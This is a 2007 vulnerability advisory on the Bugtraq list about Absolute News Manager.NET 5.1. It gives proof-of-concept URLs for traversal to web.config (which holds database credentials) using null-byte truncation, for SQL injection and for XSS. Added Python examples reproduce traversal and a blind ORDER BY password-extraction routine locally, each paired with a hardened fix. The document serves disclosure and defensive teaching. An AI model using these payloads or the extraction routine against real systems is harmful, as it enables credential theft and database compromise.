List: bugtraq
Subject: PR07-39: Multiple vulnerabilities on Absolute News Manager.NET
From: research () procheckup ! com
Date: 2007-12-04 14:20:36
Message-ID: 20071204142036.22514.qmail () securityfocus ! com
PR07-39: Multiple vulnerabilities on Absolute News Manager.NET 5.1 including file retrieval and SQL injection
Vulnerabilities found: 16 November 2007
Vendor informed: 19 November 2007
Vulnerability fixed: 28 November 2007
Severity: High
Description:
Multiple vulnerabilities were found in Absolute News Manager.NET 5.1:
- unauthenticated file retrieval (directory traversal) on '/pages/default.aspx'
- unauthenticated SQL injection on 'xlaabsolutenm.aspx' and possibly '/pages/default.aspx'
- XSS on 'xlaabsolutenm.aspx' and '/pages/default.aspx'
- webroot disclosure on 'getpath.aspx'
File retrieval PoC:
The following URL shows the contents of the .NET 'web.config' file (which contains the database credentials):
http://target.tld/[CustomerDefinedDir]/pages/default.aspx?a=1&template=../web.config
The following URL shows the source of the vulnerable script itself:
http://target.tld/[CustomerDefinedDir]/pages/default.aspx?a=1&template=default.aspx%00
Note: to obtain the content of '.aspx' files, a null byte ('%00') must be appended after the filename. This is classic null-byte truncation: the native file API stops reading the name at the first NUL, so the name the script inspects is not the name that actually gets opened.
The same technique discloses the source of other scripts:
http://target.tld/[CustomerDefinedDir]/pages/?a=1&template=../anmviewer.ascx%00
http://target.tld/[CustomerDefinedDir]/pages/?a=1&template=../default.aspx%00
http://target.tld/[CustomerDefinedDir]/pages/?a=1&template=../PPL1HistoryTicker.aspx%00
http://target.tld/[CustomerDefinedDir]/pages/?a=1&template=../xlagc.ascx%00
http://target.tld/[CustomerDefinedDir]/pages/?a=1&template=../xlaabsolutenm.aspx%00
http://target.tld/[CustomerDefinedDir]/pages/?a=1&template=../streamconfig.aspx%00
http://target.tld/[CustomerDefinedDir]/pages/?a=1&template=../incSystem.aspx%00
http://target.tld/[CustomerDefinedDir]/pages/?a=1&template=../articlefiles/r.asp%00
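The two behaviours above (plain '../' traversal for 'web.config', traversal plus '%00' for '.aspx' sources) are reproduced below in an added example. This is not code from the advisory or from Xigla's product: the directory layout, the file contents and the assumption that the script blocklists the '.aspx' extension before handing the name to a NUL-terminating file API are all constructed for illustration. The hardened loader beside it shows the checks that close both holes.

```python
import os
import tempfile


def make_install():
    """Constructed stand-in for one customer's deployment: a web root with
    a pages/ subdirectory, web.config one level up and a few scripts.
    Sample contents only; the file names follow the advisory."""
    root = tempfile.mkdtemp()
    os.makedirs(os.path.join(root, "pages"))
    files = {
        "web.config": '<connectionStrings><add name="anm" '
                      'connectionString="uid=sa;pwd=hunter2"/></connectionStrings>',
        "pages/default.aspx": "<%@ Page %> default.aspx source",
        "pages/news.html": "<h1>news template</h1>",
        "xlaabsolutenm.aspx": "<%@ Page %> xlaabsolutenm.aspx source",
    }
    for rel, body in files.items():
        with open(os.path.join(root, rel), "w") as f:
            f.write(body)
    return root


def native_read(path):
    """Model of a C-string file API: the name ends at the first NUL byte.
    Python's own open() refuses embedded NULs, so the truncation that the
    native layer performs is reproduced here explicitly."""
    with open(path.split("\x00", 1)[0]) as f:
        return f.read()


def load_template_vulnerable(root, template):
    """Assumed shape of the flaw (the advisory shows only the symptoms):
    a blocklist on the extension, then the untrusted name joined under
    pages/ and read. The blocklist sees 'default.aspx\\x00' as not ending
    in '.aspx'; the file API then opens 'default.aspx'."""
    if template.lower().endswith(".aspx"):
        raise PermissionError("script source is not a template")
    return native_read(os.path.join(root, "pages", template))


ALLOWED_EXT = ".html"


def load_template_hardened(root, template):
    """Reject NULs outright, allowlist the extension instead of blocklisting,
    and canonicalise before checking the result is still under pages/."""
    pages = os.path.realpath(os.path.join(root, "pages"))
    if "\x00" in template or not template.lower().endswith(ALLOWED_EXT):
        raise ValueError("invalid template name")
    full = os.path.realpath(os.path.join(pages, template))
    if os.path.commonpath([pages, full]) != pages:
        raise ValueError("template escapes the pages directory")
    return native_read(full)


def hardened_rejects(root, template):
    """True when the hardened loader refuses the name."""
    try:
        load_template_hardened(root, template)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    root = make_install()
    print(load_template_vulnerable(root, "../web.config"))
    print(load_template_vulnerable(root, "default.aspx\x00"))
    for name in ("../web.config", "default.aspx\x00", "news.html"):
        state = "rejected" if hardened_rejects(root, name) else "served"
        print(repr(name), state)
```

The order of the hardened checks matters: the NUL test and the extension allowlist run on the raw string, and the containment test runs on the canonical path, so neither encoding tricks in the name nor symlinks under pages/ can move the opened file outside the intended directory.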
SQL injection PoCs:
Vulnerable script: /[CustomerDefinedDir]/xlaabsolutenm.aspx
Vulnerable parameters: z, pz, ord, sort
Requesting the following URL returns the SQL Server and Windows versions. The value of 'z' is concatenated into the query and compared with an integer, so SQL Server tries to convert the nvarchar result of '@@version' to int and echoes the string in the exception. That the unhandled exception reaches the browser is what makes this an error-based injection; without the detailed error the same flaw would still be exploitable blind.
http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=@@version&pz=9&featured=n&ord=desc&sort=posted&rmore=-&
System.Data.SqlClient.SqlException: Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2005 - 9.00.3042.00 (Intel X86) Feb 9 2007 22:47:07 Copyright (c) 1988-2005 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2) ' to data type int.
Other injection points (a single quote breaks out of the query; 'INJECTED_PAYLOAD' marks where attacker-controlled SQL goes):
http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=10&ord=asc&sort=headline'INJECTED_PAYLOAD&rmore=-&
http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=10&ord=asc'INJECTED_PAYLOAD&sort=headline&rmore=-&
http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=10'INJECTED_PAYLOAD&ord=asc&sort=headline&rmore=-&
http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=15'INJECTED_PAYLOAD&ss=y&size=1.1em&target=iframe&
http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=4&pz=21&ord=asc&sort=headline'INJECTED_PAYLOAD&
http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=4&pz=21&ord=asc'INJECTED_PAYLOAD&sort=headline&
http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=4&pz=21'INJECTED_PAYLOAD&ord=asc&sort=headline&
http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=4'INJECTED_PAYLOAD&pz=21&ord=asc&sort=headline&
http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6&ord=desc&sort=posted'INJECTED_PAYLOAD&featured=n&
http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6&ord=desc'INJECTED_PAYLOAD&sort=posted&featured=n&
http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6&pz=8'INJECTED_PAYLOAD&featured=only&
http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6&pz=9&featured=n&ord=desc&sort=posted'INJECTED_PAYLOAD&rmore=-&
http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6&pz=9&featured=n&ord=desc'INJECTED_PAYLOAD&sort=posted&rmore=-&
http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6&pz=9'INJECTED_PAYLOAD&featured=n&ord=desc&sort=posted&rmore=-&
http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6'INJECTED_PAYLOAD&ord=desc&sort=posted&featured=n&
http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6'INJECTED_PAYLOAD&pz=8&featured=only&
http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6'INJECTED_PAYLOAD&pz=9&featured=n&ord=desc&sort=posted&rmore=-&
http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=7&ord=desc&sort=posted'INJECTED_PAYLOAD&
http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=7&ord=desc'INJECTED_PAYLOAD&sort=posted&
http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=7'INJECTED_PAYLOAD&ord=desc&sort=posted&
The script '/pages/default.aspx' might also be vulnerable to SQL injection, but this has not been confirmed. Requesting either of the following URLs:
http://target.tld/[CustomerDefinedDir]/pages/default.aspx?a=40&z=9999999999999
http://target.tld/[CustomerDefinedDir]/pages/default.aspx?a=9999999999999&z=1
returns the following error:
System.Data.SqlClient.SqlException: Error converting data type nvarchar to int.
Note that an out-of-range number alone triggers this conversion error; it shows that the values reach SQL Server unvalidated, but not on its own that the query text can be altered.
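The 'sort' and 'ord' parameters are the instructive ones in the list above: a column name or sort direction cannot be passed as a bound parameter, so applications commonly concatenate them, and the 'sort=headline'INJECTED_PAYLOAD' URLs land exactly there. The following added example (not code from the advisory or from the product; the schema, the 'admins' table, the query shape and SQLite standing in for SQL Server are all constructed assumptions) shows that concatenation pattern, a blind extraction that needs no error message because it uses only the order of the returned rows as its oracle, and the allowlist-plus-bind fix.

```python
import sqlite3

# Constructed sample schema and rows: a stand-in for the news database,
# since the advisory gives neither schema nor query text.
SCHEMA = """
CREATE TABLE articles (articleID INTEGER PRIMARY KEY, headline TEXT,
                       posted TEXT, zone INTEGER);
CREATE TABLE admins (username TEXT, password TEXT);
INSERT INTO articles VALUES (1, 'Zulu',  '2007-11-01', 6),
                            (2, 'Mike',  '2007-11-02', 6),
                            (3, 'Alpha', '2007-11-03', 6);
INSERT INTO admins VALUES ('admin', 's3cret');
"""


def connect():
    con = sqlite3.connect(":memory:")
    con.executescript(SCHEMA)
    return con


def headlines_vulnerable(con, z, sort, ord_):
    """Assumed shape of the flaw: z, sort and ord are spliced into the SQL
    text, which is what lets '@@version' or a quote into the query."""
    sql = f"SELECT headline FROM articles WHERE zone = {z} ORDER BY {sort} {ord_}"
    return [row[0] for row in con.execute(sql)]


def oracle(con, condition):
    """Blind boolean oracle through the ORDER BY expression: when the
    injected CASE picks headline, 'Zulu' sorts first in descending order;
    when it picks articleID, row 3 ('Alpha') comes first instead."""
    payload = f"(CASE WHEN ({condition}) THEN headline ELSE articleID END)"
    return headlines_vulnerable(con, "6", payload, "desc")[0] == "Zulu"


CHARSET = "abcdefghijklmnopqrstuvwxyz0123456789"


def extract_admin_password(con, max_len=32):
    """Recover a secret one character at a time using only row order."""
    found = ""
    for pos in range(1, max_len + 1):
        for c in CHARSET:
            cond = f"substr((SELECT password FROM admins), {pos}, 1) = '{c}'"
            if oracle(con, cond):
                found += c
                break
        else:
            break  # no character matched: end of the string
    return found


ALLOWED_SORT = {"articleID", "headline", "posted"}
ALLOWED_ORD = {"asc", "desc"}


def headlines_hardened(con, z, sort, ord_):
    """z is a value, so it is bound. sort/ord are an identifier and a
    keyword, which cannot be bound, so they are allowlisted before being
    spliced in."""
    if sort not in ALLOWED_SORT or ord_.lower() not in ALLOWED_ORD:
        raise ValueError("invalid sort parameters")
    sql = f"SELECT headline FROM articles WHERE zone = ? ORDER BY {sort} {ord_}"
    return [row[0] for row in con.execute(sql, (int(z),))]


def hardened_rejects(con, z, sort, ord_):
    """True when the hardened query refuses the request."""
    try:
        headlines_hardened(con, z, sort, ord_)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    con = connect()
    print(headlines_vulnerable(con, "6", "headline", "desc"))
    print("admin password:", extract_admin_password(con))
    print(hardened_rejects(con, "@@version", "posted", "desc"))
```

The allowlist is the point: escaping a column name does not help, because the value is not a string literal in the query, and a lookup table of permitted names removes the concatenation problem entirely. The same CASE-in-ORDER-BY oracle works against SQL Server, which is why fixing only the error page would not be a fix.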
XSS PoCs:
Vulnerable script: '/xlaabsolutenm.aspx'
Unsanitized parameter: 'rmore'
http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=1,7&sort=articleID&ord=desc&rmore=%3Cscript%3Ealert(1)%3C/script%3E&size=2&h=abc&isframe=y
Vulnerable script: '/pages/default.aspx'
Unsanitized parameter: 'template'
http://target.tld/[CustomerDefinedDir]/pages/?a=1&template=%3Cscript%3Ealert(2)%3C/script%3E
Webroot PoC:
Requesting the 'getpath.aspx' demo script discloses the physical path of the webroot, i.e.:
http://target.tld/[CustomerDefinedDir]/getpath.aspx
"
Absolute News Manager Physical Path :
D:\inetpub\target.tld\[CustomerDefinedDir]\
Please delete this file from your installation.
"
Consequences:
The contents of any file readable by the web server process can be obtained, including 'web.config' with the database credentials. Arbitrary SQL can be injected into the application's queries. Script can be run within the security context of the target domain. Information about the target environment (software versions, physical paths) can be extracted.
Fix:
http://www.xigla.com/security/
http://www.xigla.com/security/ANMNET51-SecurityUpdate20071128.zip
Note: ProCheckUp has NOT tested the patch provided by Xigla Software.
References:
http://www.procheckup.com/Vulnerability_2007.php
http://www.xigla.com/absolutenmnet/
Credits: Adrian Pastor, Jan Fry and Richard Brain of ProCheckUp Ltd (www.procheckup.com)
ProCheckUp thanks Xigla Software for working with us.